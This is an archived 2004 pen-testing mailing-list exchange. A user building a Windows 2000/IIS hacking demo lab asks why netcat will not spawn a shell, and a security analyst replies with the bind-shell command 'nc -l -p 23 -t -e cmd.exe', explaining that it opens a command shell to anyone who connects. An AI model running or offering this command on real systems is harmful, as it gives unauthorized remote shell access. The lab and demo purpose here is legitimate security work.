From: Grissett, Chris CONT Ciber (Chris.Grissett.Ciberusarc-emh2.army.mil)
Date: Fri Jun 11 2004 - 09:49:30 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Try this command on the remote machine
nc -l -p 23 -t -e cmd.exe

This allows nc to listen on port 23 for connections. When a connection is
made it will spawn a cmd[dos] shell, or whatever program you want to exec.
Hope that helps. If that fails, you can really impress the execs by using
knoppix-std (http://knoppix-std.org), to do all your hacking demos. Or if
you'd like, you could give me access to your lab, and Id do it for you. I'm
kidding, of course I couldn't do that, plus it would violate numerous laws
and ethics :) Are you familiar with linux?

Christopher Grissett
Security Analyst
Network Enterprise Security Team

-----Original Message-----
From: raza sharif [mailto:razaraza.demon.co.uk]
Sent: Friday, June 11, 2004 7:42 AM
To: pen-testsecurityfocus.com
Subject: Hacking Demo and Test Lab

Hi Folks ,

Im doing some advanced Hacking Demos for management and also Corporates etc.

I have a installed windows 2000 server and iis 5.0 on VMWARE GSX server.

Im using Webdav and other exploits that all basically should spawn a shell
using netcat.

Im using XP as my attacking machine.

Prob at the moment is Netcat will not spawn a shell regardless of what i
try.

Any ideas ? i checked the install it is windows 2000 500.1295 no reference
to service packs etc. it's a default install.

Also what are good demo's etc to run to show real hacking on windows 2000 ,
iis etc..that i can get to work

thanks

Raza

Razaraza.demon.co.uk

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]